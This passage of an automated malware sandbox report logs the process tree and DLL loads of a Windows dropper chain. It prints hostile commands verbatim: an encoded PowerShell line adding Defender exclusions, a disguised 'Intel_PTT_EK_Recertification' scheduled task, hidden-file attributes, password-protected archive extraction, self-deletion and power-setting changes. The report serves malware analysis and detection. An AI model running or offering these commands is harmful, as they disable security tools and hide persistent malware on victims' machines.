                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exe explorer.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeProcess created: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe "C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsStopped.exe "C:\Users\user\AppData\Roaming\IsStopped.exe"
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: unknown unknown
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
